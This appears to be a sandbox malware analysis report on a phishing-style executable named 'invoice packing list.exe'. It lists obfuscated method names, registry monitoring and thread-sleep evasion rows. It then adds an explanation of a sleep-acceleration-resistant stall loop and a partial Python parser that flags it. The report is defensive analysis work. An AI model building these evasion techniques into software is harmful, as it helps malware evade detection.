Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, j1gFGoXv2S6nIHvGHT.cs | High entropy of concatenated method names: 'ToString', 'NTtT7NW4tR', 'iGqTnMg16J', 'YQJTl5AaeT', 'f26TeMjAkL', 'IT8TCEK5nK', 'FpETSY3k8Q', 'AwWTDGMUdi', 'FnZTuoOF2Z', 'd0bTRJgv1P'
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, a284xdII5yLBtRLk15W.cs | High entropy of concatenated method names: 'Bb7V5FjYke', 'a8XVzvPDMl', 'kiPcOsNUNr', 'IaHcIjUPGf', 'J0Ic2Gu9F6', 'Gpacy8EMeC', 'DoZcf6nloe', 'APccbfPfLw', 'nZYcHit2wM', 'bPvcQjhvcR'
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, xoB6256fyHcwTsGSFY.cs | High entropy of concatenated method names: 'AewF8cr0yT', 'xpTFjpdHTW', 'desFqD70b7', 'TnbFnBfbFT', 'luVFeyr7sF', 'gOYFCTQctY', 'u0wFDg1BCR', 'oKkFuZUBln', 'mUxF3ybs0I', 'ieQF73tp99'
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, Q95703IO9rX5a8MElxl.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'maRV7BOeyn', 'R8TVtuy3as', 'RtHV6Ey4GS', 'LEYVJiM15u', 'yorVULmkZY', 'JbZVXBR2nD', 'Wy4V1iebwv'
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, F4Wcut0tUpQuiHlWmD.cs | High entropy of concatenated method names: 'b51ybtIs57', 'IZ9yHXjGXC', 'H5gyQmo4LD', 'MBjymjhdjO', 'IPoyPtwryf', 'qaQyM9eeb6', 'xWcykCP1qW', 'ER0y0EOZLQ', 'KJIyglWeL8', 'Ct7yERpdAy'
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, zeC4y8qqdFGihnfe7F.cs | High entropy of concatenated method names: 'AVHMbfJXTp', 'zK9MQORnWo', 'aHPMPRwGin', 'BikMkfAaY3', 'D8gM0uFn6k', 'GwEPoXog5n', 'EaRPwxqhYg', 'QEgPNngK8W', 'gcqPAXGRKM', 'Df1Pr6IySE'
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, WW3P9p5VnJt57g3Q1E.cs | High entropy of concatenated method names: 'do9VmVJewj', 'j7EVP5eGp5', 'cKYVMNqiCv', 'kqbVkPd1SV', 'yIHVhEriNh', 'TpDV0KhjWu', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, EyMo88rs0Ara9Txj0w.cs | High entropy of concatenated method names: 'PKShqKRLin', 'yk2hnAJltv', 'jdfhlVUD9w', 'oi4heHIGMi', 'stfhCDbg1m', 'YTghSELsZN', 'eMihDwpFDW', 'FeRhu21r2D', 'LSxhRsdb1W', 'Aggh3L4sEG'
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, Ud9QceN44K6Mw96FA1.cs | High entropy of concatenated method names: 'NPBhGFOeiI', 'b0Rhx7rZJ7', 'DUOhhZnxZO', 'WjshcQuA0b', 'DDshp6LfX6', 'qTDhiNfcK5', 'Dispose', 'bDVBHpkZeg', 'OotBQLP8Bv', 'f01BmQCl9e'
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, dD0BVxQqWcHNl3EOSs.cs | High entropy of concatenated method names: 'Dispose', 'z6MIrw96FA', 'NWF2nsD7GB', 'wcJRF1gXwW', 'ToCI5PDimL', 'ca6IzdYJs2', 'ProcessDialogKey', 'L9j2OyMo88', 'w0A2Ira9Tx', 'E0w22AW3P9'
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, u65AEyzuvTaiVXsVTe.cs | High entropy of concatenated method names: 'fDJVacQVCI', 'ckUV8vOMvo', 'WseVjpQcCv', 'mTBVqPQMDZ', 'Xw3VnjkjAq', 'ydHVePgxTu', 'tlJVCl2M73', 'thWViC8NHL', 'qPXVLotb1J', 'LeKV9ZoyXV'
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, FR0QiRIfhQaCC6ovHDv.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fdpdh70MZR', 'k57dVL3dnn', 'z3adchBEu9', 'yDpddLYDXs', 'bfWdptaqj2', 'wBhdsdJy5S', 'VPXdiVxOGa'
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, DS7BW0DFsb2tsRZAL8.cs | High entropy of concatenated method names: 'R96kHMshJB', 'lCUkmfLuc0', 'WYpkMfrhiW', 'hO6M5esJym', 'bAhMzeG4Gd', 'vv8kOYAvk3', 'bNYkIHi8vw', 'rllk28Ih9u', 'QYYkyB64au', 'DMskfQUrlU'
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, BCWpgj8j50mWaxBvP6.cs | High entropy of concatenated method names: 'fcqQJ0xSkG', 'oAaQUWrGSX', 'eeKQX0YeEU', 'CwrQ1Ayhuf', 'Jc3QoP5WVj', 'OZZQwUWl6V', 'TLCQN7epej', 'jpaQAoNuxi', 'FX0QrWAqH6', 'gPtQ5JRLlS'
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, sw2xZcJUwW7c0RvEVa.cs | High entropy of concatenated method names: 'FYRG3lU5I5', 'wVCGt2G5dp', 'NVmGJo30i9', 'kqSGUSgt0k', 'B4JGntLB34', 'bTLGlbkeha', 'n1pGeJed8O', 'IuAGCugQB9', 'FEOGS5Y9hn', 'm1gGD8nZYJ'
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, XZ1it8U9PwDjdP7gXi.cs | High entropy of concatenated method names: 'CRZGN9kx6J', 'R8CGA8OHXp', 'jrIGrlae60', 'RXNG5wq5YG', 'o1TSfLVHTNeDfVf3INo', 'DdiQ5KVinI0jkqm4hNH', 'o4Hd5lVrVvmPy7ZufF2', 'S1SUy7VZoEQpEtPX6qG'
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, zSiLhA2jy2oTvl6tbs.cs | High entropy of concatenated method names: 'qUoKs99lB', 'LlMYYM6G6', 'vRNaVVKpb', 'yqv4ph6bv', 'Rjcj6Fs4x', 'FaLZ3H8h3', 'D5acoEfUKcP3Zg9E7G', 't1HSwl05RVYmIyjq7K', 'DLrBAS1PT', 'mlPVHZ8qx'
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, UCgCHyZk2L11G2cjVp.cs | High entropy of concatenated method names: 'IthPW1xAmO', 'CmNP4IdRdG', 'sYKmlv6yOI', 'gyXmeep86u', 'kIqmCsIcwY', 'pEQmSTySWH', 'RKemDldfUQ', 'Lytmu4i1xB', 'M8LmRFqoQP', 'EJsm3bIT70'
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, khg9ERRp3gHWVtiDLt.cs | High entropy of concatenated method names: 'NSKkLdn3E7', 'wkWk9yoRFD', 'pGvkKvEnjv', 'lUskYg6uwV', 'wNVkWgWdOx', 'pu9ka3hNQQ', 'afYk4EnTMT', 'gj7k8sGyr7', 'h9ikjAG620', 'GubkZajCWr'
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, RGlWmwje7LtvZq0b4l.cs | High entropy of concatenated method names: 'Oi5mY96SWr', 'co5ma2uxTa', 'rxAm8otwLu', 'DHwmjEe7dj', 'zV6mGd0yP9', 'viHmTFhVaJ', 'n2JmxhU7jj', 'QuUmBqaI5q', 'LtZmhiYiO7', 'fV2mVNZF1k'
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, DvPB97fbEbk6oqcSaO.cs | High entropy of concatenated method names: 'niWIkCWpgj', 'E50I0mWaxB', 'Ue7IELtvZq', 'kb4IvloCgC', 'bcjIGVpKeC', 'Cy8ITqdFGi', 'VZR9gm3M9o7xsHgeRQ', 'fFOOQ8NZcDkEOEDiV9', 'p4bIIJmaHs', 'ylMIywI9yG'
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, j1gFGoXv2S6nIHvGHT.cs | High entropy of concatenated method names: 'ToString', 'NTtT7NW4tR', 'iGqTnMg16J', 'YQJTl5AaeT', 'f26TeMjAkL', 'IT8TCEK5nK', 'FpETSY3k8Q', 'AwWTDGMUdi', 'FnZTuoOF2Z', 'd0bTRJgv1P'
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, a284xdII5yLBtRLk15W.cs | High entropy of concatenated method names: 'Bb7V5FjYke', 'a8XVzvPDMl', 'kiPcOsNUNr', 'IaHcIjUPGf', 'J0Ic2Gu9F6', 'Gpacy8EMeC', 'DoZcf6nloe', 'APccbfPfLw', 'nZYcHit2wM', 'bPvcQjhvcR'
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, xoB6256fyHcwTsGSFY.cs | High entropy of concatenated method names: 'AewF8cr0yT', 'xpTFjpdHTW', 'desFqD70b7', 'TnbFnBfbFT', 'luVFeyr7sF', 'gOYFCTQctY', 'u0wFDg1BCR', 'oKkFuZUBln', 'mUxF3ybs0I', 'ieQF73tp99'
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, Q95703IO9rX5a8MElxl.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'maRV7BOeyn', 'R8TVtuy3as', 'RtHV6Ey4GS', 'LEYVJiM15u', 'yorVULmkZY', 'JbZVXBR2nD', 'Wy4V1iebwv'
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, F4Wcut0tUpQuiHlWmD.cs | High entropy of concatenated method names: 'b51ybtIs57', 'IZ9yHXjGXC', 'H5gyQmo4LD', 'MBjymjhdjO', 'IPoyPtwryf', 'qaQyM9eeb6', 'xWcykCP1qW', 'ER0y0EOZLQ', 'KJIyglWeL8', 'Ct7yERpdAy'
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, zeC4y8qqdFGihnfe7F.cs | High entropy of concatenated method names: 'AVHMbfJXTp', 'zK9MQORnWo', 'aHPMPRwGin', 'BikMkfAaY3', 'D8gM0uFn6k', 'GwEPoXog5n', 'EaRPwxqhYg', 'QEgPNngK8W', 'gcqPAXGRKM', 'Df1Pr6IySE'
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, WW3P9p5VnJt57g3Q1E.cs | High entropy of concatenated method names: 'do9VmVJewj', 'j7EVP5eGp5', 'cKYVMNqiCv', 'kqbVkPd1SV', 'yIHVhEriNh', 'TpDV0KhjWu', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, EyMo88rs0Ara9Txj0w.cs | High entropy of concatenated method names: 'PKShqKRLin', 'yk2hnAJltv', 'jdfhlVUD9w', 'oi4heHIGMi', 'stfhCDbg1m', 'YTghSELsZN', 'eMihDwpFDW', 'FeRhu21r2D', 'LSxhRsdb1W', 'Aggh3L4sEG'
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, Ud9QceN44K6Mw96FA1.cs | High entropy of concatenated method names: 'NPBhGFOeiI', 'b0Rhx7rZJ7', 'DUOhhZnxZO', 'WjshcQuA0b', 'DDshp6LfX6', 'qTDhiNfcK5', 'Dispose', 'bDVBHpkZeg', 'OotBQLP8Bv', 'f01BmQCl9e'
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, dD0BVxQqWcHNl3EOSs.cs | High entropy of concatenated method names: 'Dispose', 'z6MIrw96FA', 'NWF2nsD7GB', 'wcJRF1gXwW', 'ToCI5PDimL', 'ca6IzdYJs2', 'ProcessDialogKey', 'L9j2OyMo88', 'w0A2Ira9Tx', 'E0w22AW3P9'
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, u65AEyzuvTaiVXsVTe.cs | High entropy of concatenated method names: 'fDJVacQVCI', 'ckUV8vOMvo', 'WseVjpQcCv', 'mTBVqPQMDZ', 'Xw3VnjkjAq', 'ydHVePgxTu', 'tlJVCl2M73', 'thWViC8NHL', 'qPXVLotb1J', 'LeKV9ZoyXV'
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, FR0QiRIfhQaCC6ovHDv.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fdpdh70MZR', 'k57dVL3dnn', 'z3adchBEu9', 'yDpddLYDXs', 'bfWdptaqj2', 'wBhdsdJy5S', 'VPXdiVxOGa'
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, DS7BW0DFsb2tsRZAL8.cs | High entropy of concatenated method names: 'R96kHMshJB', 'lCUkmfLuc0', 'WYpkMfrhiW', 'hO6M5esJym', 'bAhMzeG4Gd', 'vv8kOYAvk3', 'bNYkIHi8vw', 'rllk28Ih9u', 'QYYkyB64au', 'DMskfQUrlU'
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, BCWpgj8j50mWaxBvP6.cs | High entropy of concatenated method names: 'fcqQJ0xSkG', 'oAaQUWrGSX', 'eeKQX0YeEU', 'CwrQ1Ayhuf', 'Jc3QoP5WVj', 'OZZQwUWl6V', 'TLCQN7epej', 'jpaQAoNuxi', 'FX0QrWAqH6', 'gPtQ5JRLlS'
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, sw2xZcJUwW7c0RvEVa.cs | High entropy of concatenated method names: 'FYRG3lU5I5', 'wVCGt2G5dp', 'NVmGJo30i9', 'kqSGUSgt0k', 'B4JGntLB34', 'bTLGlbkeha', 'n1pGeJed8O', 'IuAGCugQB9', 'FEOGS5Y9hn', 'm1gGD8nZYJ'
          Source: C:\Users\user\Desktop\invoice packing list.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\invoice packing list.exe | Process information set: NOOPENFILEERRORBOX (this identical entry appears 100 times in the report)

          Malware Analysis System Evasion

Source: Yara match | File source: Process Memory Space: invoice packing list.exe PID: 3008, type: MEMORYSTR
Source: C:\Users\user\Desktop\invoice packing list.exe | Memory allocated: 2620000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\invoice packing list.exe | Memory allocated: 2860000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\invoice packing list.exe | Memory allocated: 2620000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\invoice packing list.exe | Memory allocated: 7780000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\invoice packing list.exe | Memory allocated: 8780000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\invoice packing list.exe | Memory allocated: 8930000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\invoice packing list.exe | Memory allocated: 9930000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\invoice packing list.exe | Memory allocated: 9C90000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\invoice packing list.exe | Memory allocated: AC90000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\invoice packing list.exe | Memory allocated: BC90000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\invoice packing list.exe | Memory allocated: 1480000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\invoice packing list.exe | Memory allocated: 2FD0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\invoice packing list.exe | Memory allocated: 2EF0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 599891
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 599766
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 599656
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 599547
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 599438
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 599313
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 599188
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 599078
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 598969
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 598844
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 598735
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 598610
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 598441
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 598323
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 598182
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 598074
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 597969
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 597860
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 597735
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 597610
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 597485
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 597360
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 597235
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 597110
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 596985
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 596860
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 596735
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 596610
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 596485
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 596360
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 596235
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 596110
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 595985
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 595860
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 595735
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 595610
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 595485
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 595360
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 595235
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 595110
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 594985
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 594860
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 594735
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 594610
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 594485
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 594360
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 594235
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 594110
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 593985
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 593860
Source: C:\Users\user\Desktop\invoice packing list.exe | Window / User API: threadDelayed 8216
Source: C:\Users\user\Desktop\invoice packing list.exe | Window / User API: threadDelayed 1606
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 4012 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6980 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -599891s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6160 | Thread sleep count: 8216 > 30
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6160 | Thread sleep count: 1606 > 30
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep count: 34 > 30
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -599766s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -599547s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -599438s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -599313s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -599188s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -599078s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -598969s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -598844s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -598735s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -598610s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -598441s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -598323s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -598182s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -598074s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -597969s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -597860s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -597735s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -597610s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -597485s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -597360s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -597235s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -597110s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -596985s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -596860s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -596735s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -596610s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -596485s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -596360s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -596235s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -596110s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -595985s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -595860s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -595735s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -595610s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -595485s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -595360s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -595235s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -595110s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -594985s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -594860s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -594735s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -594610s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -594485s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -594360s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -594235s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -594110s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -593985s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352 | Thread sleep time: -593860s >= -30000s
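The per-thread sleep rows above carry the actual evasion evidence of this section. Read as milliseconds (an assumption, but the one under which 600000 matches the "Contains long sleeps (>= 3 min)" verdict), thread 6980 asks for 922337203685477 ms, which is Int64.MaxValue / 10000, i.e. TimeSpan.MaxValue expressed in milliseconds, a sleep-forever request; thread 6352 first requests an equally absurd value and then a run of sleeps 600000, 599891, 599766, 599656, ... each roughly 110 to 125 ms shorter than the last. That shape is what a loop of the form "while now < deadline: sleep(deadline - now)" produces when the sandbox shortens or skips Sleep calls: the wall clock only advances by the real time spent, so the loop re-issues the remaining delay and the intended ten-minute stall survives sleep acceleration. Threads 6160's counts (8216 and 1606 sleeps) are the complementary stalling technique of many short sleeps. The Python below is an added triage helper, not part of Joe Sandbox; it parses these rows in the run-together form the report extraction produces, groups them by TID and reports which of those patterns each thread shows. The sample rows are copied from the report; the thresholds are assumptions.

```python
import re
from dataclasses import dataclass, field

# .NET TimeSpan.MaxValue in milliseconds: Int64.MaxValue ticks / 10000 ticks per ms.
# A requested delay of exactly this value is a "sleep forever" request.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000          # 922337203685477
ONE_YEAR_MS = 365 * 24 * 60 * 60 * 1000          # anything longer is treated as a sentinel too
LONG_SLEEP_MS = 3 * 60 * 1000                    # the report's own ">= 3 min" threshold
MAX_LOOP_STEP_MS = 5_000                         # assumed: shrink steps this small mean a deadline loop
MANY_SLEEPS = 1_000                              # assumed: more short sleeps than this is a stalling loop

# Constructed sample: rows copied from the report above, in the run-together form
# the extraction produces ("TID: 6352Thread sleep time: -599891s >= -30000s").
SAMPLE_ROWS = r"""
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 4012Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6980Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -599891s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6160Thread sleep count: 8216 > 30
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep count: 34 > 30
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -599766s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -599547s >= -30000s
"""

# \D*? tolerates both the run-together form and a cleaned "TID: 6352 | Thread ..." form.
SLEEP_RE = re.compile(r"TID:\s*(\d+)\D*?Thread sleep time:\s*-?(\d+)s")
COUNT_RE = re.compile(r"TID:\s*(\d+)\D*?Thread sleep count:\s*(\d+)")


def is_infinite_sentinel(ms: int) -> bool:
    return ms == TIMESPAN_MAX_MS or ms >= ONE_YEAR_MS


@dataclass
class SleepStats:
    tid: int
    delays_ms: list = field(default_factory=list)   # requested delays, in report order
    sleep_count: int = 0                            # largest "Thread sleep count" seen

    @property
    def has_infinite_sentinel(self) -> bool:
        return any(is_infinite_sentinel(d) for d in self.delays_ms)

    @property
    def max_finite_ms(self) -> int:
        return max((d for d in self.delays_ms if not is_infinite_sentinel(d)), default=0)

    @property
    def longest_deadline_run(self) -> int:
        """Longest run of consecutive requests that each shrink by a small step:
        the trace of `while now < deadline: sleep(deadline - now)` under a sandbox
        that shortens sleeps instead of honouring them."""
        best = run = 0
        prev = None
        for d in self.delays_ms:
            run = run + 1 if prev is not None and 0 < prev - d <= MAX_LOOP_STEP_MS else 1
            best = max(best, run)
            prev = d
        return best


def analyze_sleep_rows(text: str) -> dict:
    """Map TID -> SleepStats from raw report rows."""
    stats = {}
    for line in text.splitlines():
        m = SLEEP_RE.search(line)
        if m:
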